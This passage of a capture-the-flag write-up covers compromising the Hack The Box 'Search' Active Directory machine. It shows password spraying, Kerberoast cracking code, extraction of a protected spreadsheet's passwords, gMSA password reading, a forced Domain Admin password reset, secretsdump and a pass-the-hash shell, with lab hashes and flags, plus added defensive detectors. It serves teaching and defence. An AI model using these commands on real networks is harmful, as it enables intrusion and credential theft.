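    k3 = hmac_md5(k1, checksum)
    plaintext = rc4(k3, edata2)
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)


def crack(line, wordlist):
    """Dictionary attack: one MD4, three HMAC-MD5 and one RC4 per candidate."""
    for candidate in wordlist:
        if check_password(line, candidate):
            return candidate
    return None


def make_sample_hash(password, user="web_svc", realm="SEARCH.HTB", spn="search.htb/web_svc"):
    """Constructed sample in John format (assumption: fake ticket body, zero confounder)."""
    body = b"\x63\x82" + b"constructed EncTicketPart, not real ASN.1 " * 4
    blob = rc4_hmac_encrypt(nt_hash(password), body, confounder=b"\x00" * 8)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"
```

crack(make_sample_hash("@3ONEmillionbaby"), rockyou_lines) returns the password. The cost per guess is a handful of hash operations with no salt or work factor, which is why a service account with a dictionary password falls in seconds; AES-only service accounts (msDS-SupportedEncryptionTypes) or long random passwords (gMSA) are the fix.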

web_svc sees the same shares as hope.sharp, and we found nothing new in them.

 π ~/htb/search ❯ crackmapexec smb search.htb -u web_svc -p '@3ONEmillionbaby' --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\web_svc:@3ONEmillionbaby
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$                          Remote Admin
SMB         search.htb      445    RESEARCH         C$                              Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ            Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search ❯

SMB - Edgar Jacobs

Using the users collected by BloodHound and the two passwords we already know, we spray again. (The jq|grep|cut pipeline below relies on jq's pretty-printed column layout to pull the name field out; it works here but is fragile.)

 π ~/htb/search/usernames ❯ cat ../BloodHound.py/20220405224540_users.json|jq|grep '"name":"*'| cut -d ' ' -f10| cut -d '@' -f1| tr -d '"' > bloodhound_users.txt
 π ~/htb/search/usernames ❯ wc -l bloodhound_users.txt
107 bloodhound_users.txt
 π ~/htb/search/usernames ❯ cat passwords.txt
 @3ONEmillionbaby
IsolationIsKey?
 π ~/htb/search/usernames ❯
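An added example (not from the writeup) that does the job of the jq|grep|cut pipeline above directly on the JSON, and also reproduces the BloodHound "Kerberoastable accounts" query from the same data. The sample document is constructed in the shape of bloodhound.py v4 output (a "data" list of objects carrying a "Properties" dict); the accounts in it are made up, and the only field names relied on are name, enabled and hasspn.

```python
"""Usernames and Kerberoastable accounts from bloodhound.py *_users.json (added example)."""
import json
import sys

# Constructed sample in the shape of bloodhound.py v4 users output; accounts are made up.
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {"Properties": {"name": "HOPE.SHARP@SEARCH.HTB", "enabled": True, "hasspn": False}},
        {"Properties": {"name": "WEB_SVC@SEARCH.HTB", "enabled": True, "hasspn": True,
                        "serviceprincipalnames": ["RESEARCH/web_svc.search.htb:60001"]}},
        {"Properties": {"name": "KRBTGT@SEARCH.HTB", "enabled": False, "hasspn": True}},
        {"Properties": {"name": "EDGAR.JACOBS@SEARCH.HTB", "enabled": True, "hasspn": False}},
        {"Properties": {"name": "OLD.ACCOUNT@SEARCH.HTB", "enabled": False, "hasspn": False}},
    ],
    "meta": {"type": "users", "count": 5, "version": 4},
})


def load_users(text):
    """Yield the Properties dict of every user object that has a name."""
    for obj in json.loads(text).get("data", []):
        props = obj.get("Properties", {})
        if props.get("name"):
            yield props


def sam(props):
    """'WEB_SVC@SEARCH.HTB' -> 'web_svc' (the part crackmapexec wants)."""
    return props["name"].split("@", 1)[0].lower()


def usernames(text, enabled_only=True):
    """Sorted, deduplicated spray list. Disabled accounts only add failed-logon noise."""
    return sorted({sam(p) for p in load_users(text)
                   if not enabled_only or p.get("enabled", True)})


def kerberoastable(text):
    """Enabled accounts with an SPN; krbtgt is excluded, its ticket is not crackable in practice."""
    return sorted(sam(p) for p in load_users(text)
                  if p.get("hasspn") and p.get("enabled", True) and sam(p) != "krbtgt")


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_USERS_JSON
    print("\n".join(usernames(text)))
    print("kerberoastable:", ", ".join(kerberoastable(text)), file=sys.stderr)
```

Run it as ./bh_users.py 20220405224540_users.json > bloodhound_users.txt; the Kerberoastable list goes to stderr so it does not pollute the wordlist.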

Edgar.Jacobs also authenticates with @3ONEmillionbaby, the same password as web_svc (a person reusing a service account's password).

 π ~/htb/search/usernames ❯ crackmapexec smb search.htb -u bloodhound_users.txt -p passwords.txt --continue-on-success
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\WEB_SVC:@3ONEmillionbaby
[.. snip ..]
SMB         search.htb      445    RESEARCH         [+] search.htb\HOPE.SHARP:IsolationIsKey?
[.. snip ..]
SMB         search.htb      445    RESEARCH         [+] search.htb\EDGAR.JACOBS:@3ONEmillionbaby
[.. snip ..]
 π ~/htb/search/usernames ❯

SMB

Enumerating this user's shares, we see access to CertEnroll, helpdesk (now READ) and RedirectedFolders$.

 π ~/htb/search/usernames ❯ crackmapexec smb search.htb -u EDGAR.JACOBS -p "@3ONEmillionbaby" --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\EDGAR.JACOBS:@3ONEmillionbaby
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$                          Remote Admin
SMB         search.htb      445    RESEARCH         C$                              Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ            Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk        READ
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ            Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search/usernames ❯

The helpdesk share is empty.

 π ~/htb/search/usernames ❯ smbclient //search.htb/helpdesk -U 'edgar.jacobs' # @3ONEmillionbaby
Enter WORKGROUP\edgar.jacobs's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Tue Apr 14 06:24:23 2020
  ..                                 Dc        0  Tue Apr 14 06:24:23 2020

      3246079 blocks of size 4096. 418870 blocks available
smb: \>

Phishing - Passwords

Looking through RedirectedFolders$, we find an .xlsx file on Edgar.Jacobs's Desktop.

smb: \edgar.jacobs\Desktop\> ls
  .                                 DRc        0  Mon Aug 10 06:02:16 2020
  ..                                DRc        0  Mon Aug 10 06:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 16:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 06:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 16:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 06:35:44 2020

      3246079 blocks of size 4096. 418861 blocks available
smb: \edgar.jacobs\Desktop\>

Opening the file, it has two sheets; one of them is protected with a password and has a hidden column (column C).

[image: protected sheet with hidden column C]

With xlsx2csv we get the contents of the protected sheet and the hidden column: they are passwords. Sheet protection in an .xlsx is only an editing lock honoured by Excel; the cell values are stored unencrypted in the XML inside the zip, so any parser reads them (only workbook encryption would actually protect them).

 π ~/htb/search/phishing ❯ xlsx2csv Phishing_Attempt.xlsx sheets -a
 π ~/htb/search/phishing ❯ cd sheets
 π ~/htb/search/phishing/sheets ❯ ls
 Captured.csv  'Passwords 01082020.csv'
 π ~/htb/search/phishing/sheets ❯ cat Captured.csv
Date,Captured Passwords,
01-01-18,78,
[.. snip ..]
06-01-19,81,
07-01-19,79,IT ChangeOver Keely Lyons Started
08-01-19,72,
[.. snip ..]
04-01-21,14,
 π ~/htb/search/phishing/sheets ❯ cat Passwords\ 01082020.csv
firstname,lastname,password,Username
Payton,Harmon,;;36!cried!INDIA!year!50;;,Payton.Harmon
Cortez,Hickman,..10-time-TALK-proud-66..,Cortez.Hickman
Bobby,Wolf,??47^before^WORLD^surprise^91??,Bobby.Wolf
Margaret,Robinson,//51+mountain+DEAR+noise+83//,Margaret.Robinson
Scarlett,Parks,++47|building|WARSAW|gave|60++,Scarlett.Parks
Eliezer,Jordan,!!05_goes_SEVEN_offer_83!!,Eliezer.Jordan
Hunter,Kirby,~~27%when%VILLAGE%full%00~~,Hunter.Kirby
Sierra,Frye,$$49=wide=STRAIGHT=jordan=28$$18,Sierra.Frye
Annabelle,Wells,==95~pass~QUIET~austria~77==,Annabelle.Wells
Eve,Galvan,//61!banker!FANCY!measure!25//,Eve.Galvan
Jeramiah,Fritz,??40:student:MAYOR:been:66??,Jeramiah.Fritz
Abby,Gonzalez,&&75:major:RADIO:state:93&&,Abby.Gonzalez
Joy,Costa,**30*venus*BALL*office*42**,Joy.Costa
Vincent,Sutton,**24&moment&BRAZIL&members&66**,Vincent.Sutton

,,,
 π ~/htb/search/phishing/sheets ❯
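Sheet protection in Excel is a flag on the worksheet XML, not encryption, which is why xlsx2csv can read the protected sheet and the hidden column without the password. The following Python, added here as an illustration and not part of the original write-up or of xlsx2csv, parses a constructed worksheet part (an .xlsx is a zip that contains such files under xl/worksheets/) and reports the protection flag, the hidden columns and the clear-text values they still carry.

```python
import xml.etree.ElementTree as ET

# Worksheet parts inside an .xlsx (xl/worksheets/sheetN.xml) use this namespace.
NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

# Constructed worksheet XML modelled on the case above: "protect sheet" is on and
# column C is hidden. Cell text is inline so no sharedStrings part is needed;
# the password attribute is a made-up 16-bit legacy hash, not a real one.
SAMPLE_SHEET_XML = """
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <cols><col min="3" max="3" width="14" hidden="1"/></cols>
  <sheetData>
    <row r="1">
      <c r="A1" t="inlineStr"><is><t>firstname</t></is></c>
      <c r="B1" t="inlineStr"><is><t>lastname</t></is></c>
      <c r="C1" t="inlineStr"><is><t>password</t></is></c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr"><is><t>Example</t></is></c>
      <c r="B2" t="inlineStr"><is><t>User</t></is></c>
      <c r="C2" t="inlineStr"><is><t>constructed-secret-01</t></is></c>
    </row>
  </sheetData>
  <sheetProtection sheet="1" objects="1" scenarios="1" password="CC1A"/>
</worksheet>
""".strip()

def col_index(cell_ref):
    """'C2' -> 3: turn the column letters of a cell reference into a 1-based index."""
    n = 0
    for ch in cell_ref:
        if not ch.isalpha():
            break
        n = n * 26 + ord(ch.upper()) - 64
    return n

def audit_sheet(xml_text):
    """Report the protection flag, the hidden columns, and the clear-text values
    those hidden columns still hold inside the file."""
    root = ET.fromstring(xml_text)
    protected = root.find("m:sheetProtection", NS) is not None
    hidden = set()
    for col in root.findall("m:cols/m:col", NS):
        if col.get("hidden") == "1":
            hidden.update(range(int(col.get("min")), int(col.get("max")) + 1))
    hidden_values = []
    for c in root.findall("m:sheetData/m:row/m:c", NS):
        if col_index(c.get("r")) in hidden:
            node = c.find("m:is/m:t", NS)        # inline string ...
            if node is None:
                node = c.find("m:v", NS)         # ... or number / shared-string index
            hidden_values.append((c.get("r"), node.text if node is not None else ""))
    return {"protected": protected, "hidden_columns": sorted(hidden), "hidden_values": hidden_values}
```

Sensitive data that must not leave a workbook has to be removed from it or the file encrypted; a protected or hidden sheet only controls the Excel UI.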

We create two wordlists, passwords and usernames, from the generated .csv file.

 π ~/htb/search/phishing/sheets ❯ cat Passwords\ 01082020.csv | cut -d ',' -f3 > phish_passwords.txt
 π ~/htb/search/phishing/sheets ❯ wc -l phish_passwords.txt
17 phish_passwords.txt
 π ~/htb/search/phishing/sheets ❯ cat Passwords\ 01082020.csv | cut -d ',' -f4 > phish_usernames.txt
 π ~/htb/search/phishing/sheets ❯ wc -l phish_usernames.txt
17 phish_usernames.txt
 π ~/htb/search/phishing/sheets ❯

We merge the phish_usernames.txt and bloodhound_users.txt wordlists, and likewise phish_passwords.txt and passwords.txt.

 π ~/htb/search/usernames ❯ cat bloodhound_users.txt ../phishing/sheets/phish_usernames.txt | tr '[:upper:]' '[:lower:]' | sort | uniq > blood_phish_usernames.txt
 π ~/htb/search/usernames ❯ cat bloodhound_users.txt ../phishing/sheets/phish_usernames.txt | tr '[:upper:]' '[:lower:]' | sort | uniq | wc -l
109
 π ~/htb/search/usernames ❯ cat passwords.txt ../phishing/sheets/phish_passwords.txt > phish_known_passwords.txt
 π ~/htb/search/usernames ❯ wc -l phish_known_passwords.txt
19 phish_known_passwords.txt
 π ~/htb/search/usernames ❯

User - Sierra Frye

We run the 'brute force' again with the newly found usernames and passwords, and find the password for sierra.frye.

 π ~/htb/search/usernames ❯ crackmapexec smb search.htb -u blood_phish_usernames.txt -p phish_known_passwords.txt --continue-on-success|grep -v 'STATUS_LOGON_FAILURE'
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [-] search.htb\: STATUS_ACCESS_DENIED
SMB         search.htb      445    RESEARCH         [-] search.htb\: STATUS_ACCESS_DENIED
SMB         search.htb      445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         search.htb      445    RESEARCH         [-] search.htb\guest: STATUS_ACCOUNT_DISABLED
SMB         search.htb      445    RESEARCH         [-] search.htb\guest: STATUS_ACCOUNT_DISABLED
SMB         search.htb      445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?
SMB         search.htb      445    RESEARCH         [+] search.htb\sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18
SMB         search.htb      445    RESEARCH         [+] search.htb\web_svc:@3ONEmillionbaby
 π ~/htb/search/usernames ❯
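From the defender's side, a spray like the one above shows up on the domain controller as a burst of failed logons for many different accounts from one source in a short window. This Python, added here and not part of the original write-up, runs that check over constructed sample events (the source addresses and timestamps are made up) and distinguishes the spray from a single-account brute force, which has many failures but only one target user.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon events, reduced to the fields a 4625/4771
# record carries (time, target account, source address, NT status). The first
# source tries one password against many accounts; the second hammers one account.
SAMPLE_EVENTS = """
2022-03-10T19:55:01 user=edgar.jacobs src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:01 user=hope.sharp src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:02 user=sierra.frye src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:02 user=payton.harmon src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:03 user=cortez.hickman src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:03 user=bobby.wolf src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:04 user=eve.galvan src=10.10.14.5 status=0xC000006D
2022-03-10T19:55:04 user=joy.costa src=10.10.14.5 status=0xC000006D
2022-03-10T20:10:00 user=hope.sharp src=10.10.14.5 status=0xC000006D
2022-03-10T19:58:10 user=web_svc src=10.10.14.9 status=0xC000006D
2022-03-10T19:58:11 user=web_svc src=10.10.14.9 status=0xC000006D
2022-03-10T19:58:12 user=web_svc src=10.10.14.9 status=0xC000006D
2022-03-10T19:58:13 user=web_svc src=10.10.14.9 status=0xC000006D
2022-03-10T19:58:14 user=web_svc src=10.10.14.9 status=0xC000006D
2022-03-10T19:58:15 user=web_svc src=10.10.14.9 status=0xC000006D
2022-03-10T19:58:16 user=web_svc src=10.10.14.9 status=0xC000006D
""".strip().splitlines()

def parse_event(line):
    """'<iso time> user=.. src=.. status=..' -> (datetime, user, src, status)."""
    ts, *kv = line.split()
    fields = dict(part.split("=", 1) for part in kv)
    return datetime.fromisoformat(ts), fields["user"].lower(), fields["src"], fields["status"]

def detect_spray(lines, window=timedelta(minutes=5), min_users=5):
    """Return {source: distinct_users} for sources that fail logons against at
    least min_users different accounts inside one sliding window."""
    by_src = defaultdict(list)
    for line in lines:
        ts, user, src, status = parse_event(line)
        if status == "0xC000006D":              # STATUS_LOGON_FAILURE: bad password
            by_src[src].append((ts, user))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = max(hits.get(src, 0), len(users))
    return hits
```

Tuning min_users and the window against the normal failure rate of the domain keeps the rule from firing on help-desk password resets, while a lockout policy alone does not stop a low-and-slow spray that stays under the threshold.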

We access RedirectedFolders$, where we find and download the user.txt flag.

 π ~/htb/search ❯ cat user.txt
ad2a8266d4a4767ffe773770a94de7d9
 π ~/htb/search ❯

Certs

In addition, in the \backups folder we see two certificates that are most likely related to the /staff page.

smb: \sierra.frye\downloads\backups\> ls
  .                                 DHc        0  Mon Aug 10 16:39:17 2020
  ..                                DHc        0  Mon Aug 10 16:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 11:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 16:39:17 2020

      3246079 blocks of size 4096. 676825 blocks available
smb: \sierra.frye\downloads\backups\>

When we try to import the certificates we see that both are password-protected.

Password Hash Cracking

We use pfx2john.py to extract a hash from both certificates, and with john and the rockyou.txt wordlist we recover the password for both, which turns out to be the same.

 π ~/htb/search/cert_sierra ❯ john --wordlist=$ROCK staff_pfx_hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (staff.pfx)
1g 0:00:01:20 DONE (2022-03-10 20:00) 0.01237g/s 67886p/s 67886c/s 67886C/s misssnamy..missnono
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/search/cert_sierra ❯
π ~/htb/search/cert_sierra ❯ john --wordlist=$ROCK search_p12_hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
misspissy        (search-RESEARCH-CA.p12)
1g 0:00:01:30 DONE (2022-03-10 20:02) 0.01110g/s 60878p/s 60878c/s 60878C/s misssnamy..missnono
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/search/cert_sierra ❯

PowerShell Web

After visiting /staff, we import and select the staff.pfx certificate.

We see a PowerShell Web Access login panel.

Using sierra.frye's credentials we are able to log in.

USER: sierra.frye
PASS: $$49=wide=STRAIGHT=jordan=28$$18
COMPUTER NAME: RESEARCH


Privesc

After going through the directories we find no relevant information, so we go back to the BloodHound data.

BloodHound

Using the predefined queries we find a path to Domain Admin.

  • First, we see that sierra.frye is a member of the Birmingham-ITSec and ITSec groups; the latter can read the password of the BIR-ADFS-GMSA account.
  • Next, we see that BIR-ADFS-GMSA has GenericAll over the user Tristan.Davies, who belongs to the Domain Admins group.

BIR-ADFS-GMSA

GMSA

BloodHound suggests using gmsapasswordreader.exe, but it was not possible to connect from the machine to our Samba server to download the executable.

We use gMSADumper to obtain the hash of BIR-ADFS-GMSA with sierra.frye's credentials.

 π gMSADumper main ✗ ❯ ./gMSADumper.py -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -l 10.10.11.129 -d search.htb
Users or groups who can read password for BIR-ADFS-GMSA$:
 > ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
 π gMSADumper main ✗ ❯

However, authenticating with the hash did not work, and neither did cracking it.

 π ~/htb/search ❯ impacket-psexec "BIR-ADFS-GMSA$"@search.htb -hashes :e1e9fd9e46d0d747e1595167eedcec0f
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on search.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'CertEnroll' is not writable.
[-] share 'helpdesk' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share RedirectedFolders$
[*] Uploading file WFSVyazG.exe
[*] Opening SVCManager on search.htb.....
[-] Error opening SVCManager on search.htb.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager
 π ~/htb/search ❯

Researching gMSA on Windows we find a post about ReadGMSAPassword in PowerShell, which shows the commands used to read the password.

$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp

After running the commands we see the password in 'plaintext', but it consists of unreadable characters; it does however expose a SecureString 'property', which we could use to run commands as in Arkham - HTB.

First, in the $secure variable we obtain the SecureString property to use it as the password of a PSCredential.

# GMSA
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
$secure = ConvertFrom-ADManagedPasswordBlob $mp

# Credentials
$username ="BIR-ADFS-GMSA";
$password = $secure.SecureCurrentPassword; 
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $username, $password; 
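The 'unreadable' plaintext comes from the layout of msDS-ManagedPassword: the current password is a long random byte string stored as a null-terminated UTF-16LE string inside an MSDS-MANAGEDPASSWORD_BLOB, next to the rotation intervals. The following Python, added here and unrelated to gMSADumper or the PowerShell above, builds a constructed blob (256 deterministic bytes stand in for the random password) and parses it; it shows why decoding the bytes as text gives garbage while the raw bytes still work as a credential, and exposes the rotation interval a defender would check.

```python
import struct

# MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19), all fields little-endian:
#   Version(2) Reserved(2) Length(4) CurrentPasswordOffset(2)
#   PreviousPasswordOffset(2) QueryPasswordIntervalOffset(2) UnchangedPasswordIntervalOffset(2)
# followed by null-terminated WCHAR passwords, alignment padding, and two 8-byte
# intervals in 100 ns units.
HEADER = "<HHIHHHH"
TICKS_PER_DAY = 10_000_000 * 86_400

def build_blob(current: bytes, query_days: int, unchanged_days: int) -> bytes:
    """Constructed blob with no previous password, so the parser can run offline."""
    cur = current + b"\x00\x00"                      # WCHAR string terminator
    end = 16 + len(cur)
    pad_to = (end + 7) // 8 * 8                      # intervals are 8-byte aligned
    q_off, u_off = pad_to, pad_to + 8
    header = struct.pack(HEADER, 1, 0, u_off + 8, 16, 0, q_off, u_off)
    tail = struct.pack("<QQ", query_days * TICKS_PER_DAY, unchanged_days * TICKS_PER_DAY)
    return header + cur + b"\x00" * (pad_to - end) + tail

def _wchar_string(blob: bytes, off: int) -> bytes:
    """Bytes of the null-terminated UTF-16LE string starting at off (scan per WCHAR)."""
    end = off
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
    return blob[off:end]

def parse_blob(blob: bytes) -> dict:
    version, _, length, cur_off, prev_off, q_off, u_off = struct.unpack_from(HEADER, blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version 1 MSDS-MANAGEDPASSWORD_BLOB")
    current = _wchar_string(blob, cur_off)
    previous = _wchar_string(blob, prev_off) if prev_off else b""
    query_ticks = struct.unpack_from("<Q", blob, q_off)[0]
    unchanged_ticks = struct.unpack_from("<Q", blob, u_off)[0]
    return {
        "current_password": current,
        # Random bytes rarely form valid UTF-16; this is the "illegible" PowerShell output.
        "current_as_text": current.decode("utf-16-le", errors="replace"),
        "previous_password": previous,
        "query_interval_days": query_ticks / TICKS_PER_DAY,
        "unchanged_interval_days": unchanged_ticks / TICKS_PER_DAY,
    }

# Constructed sample: deterministic bytes stand in for the random managed password.
SAMPLE_BLOB = build_blob(bytes(range(256)), 30, 30)
```

Which principals may read this attribute is governed by the account's PrincipalsAllowedToRetrieveManagedPassword (here the ITSec group), so membership of that group should be as tightly controlled as the service account itself.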

Finally, we run commands with Invoke-Command.

# Run Commands
Invoke-Command -ScriptBlock { whoami } -ComputerName RESEARCH -Credential $cred

After running the last command we see that we have access as BIR-ADFS-GMSA.

Tristan Davies

As we know, BIR-ADFS-GMSA has GenericAll over tristan.davies; according to BloodHound this allows either a targeted Kerberoast or a password change for the user.

Since we have access as BIR-ADFS-GMSA, we change tristan's password.

Invoke-Command -ScriptBlock { net user tristan.davies Password123! /domain } -ComputerName RESEARCH -Credential $cred

We see that the command ran successfully.

Running CrackMapExec we see that we have access to all shares.

 π ~/htb/search ❯ crackmapexec smb search.htb -u tristan.davies -p 'Password123!' --shares
SMB         search.htb      445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         search.htb      445    RESEARCH         [+] search.htb\tristan.davies:Password123! (Pwn3d!)
SMB         search.htb      445    RESEARCH         [+] Enumerated shares
SMB         search.htb      445    RESEARCH         Share           Permissions     Remark
SMB         search.htb      445    RESEARCH         -----           -----------     ------
SMB         search.htb      445    RESEARCH         ADMIN$          READ,WRITE      Remote Admin
SMB         search.htb      445    RESEARCH         C$              READ,WRITE      Default share
SMB         search.htb      445    RESEARCH         CertEnroll      READ,WRITE      Active Directory Certificate Services share
SMB         search.htb      445    RESEARCH         helpdesk
SMB         search.htb      445    RESEARCH         IPC$            READ            Remote IPC
SMB         search.htb      445    RESEARCH         NETLOGON        READ,WRITE      Logon server share
SMB         search.htb      445    RESEARCH         RedirectedFolders$ READ,WRITE
SMB         search.htb      445    RESEARCH         SYSVOL          READ            Logon server share
 π ~/htb/search ❯

Administrator

We use secretsdump to obtain the Administrator user's hash.

 π ~/htb/search ❯ impacket-secretsdump tristan.davies:'Password123!'@search.htb -just-dc-user Administrator
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c870b887ebb9c0900fc3c1ef25e0592c4da89bf7eb1cf6d3064d44afb2dc86f9
Administrator:aes128-cts-hmac-sha1-96:07431caa0e0c70a2adc8f9ce43e181b1
Administrator:des-cbc-md5:52d02af1f2fba43e
[*] Cleaning up...
 π ~/htb/search ❯

Shell

Finally, using wmiexec we get a shell and the root.txt flag.

 π ~/htb/search ❯ impacket-wmiexec administrator@search.htb -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator

C:\>cd Users/Administrator/Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is B8F8-6F48

 Directory of C:\Users\Administrator\Desktop

22/11/2021  21:21    <DIR>          .
22/11/2021  21:21    <DIR>          ..
09/04/2022  02:22                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,568,282,112 bytes free

C:\Users\Administrator\Desktop>type root.txt
284a14da6bec1277cd63ff3c81d18c2e

C:\Users\Administrator\Desktop>

Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe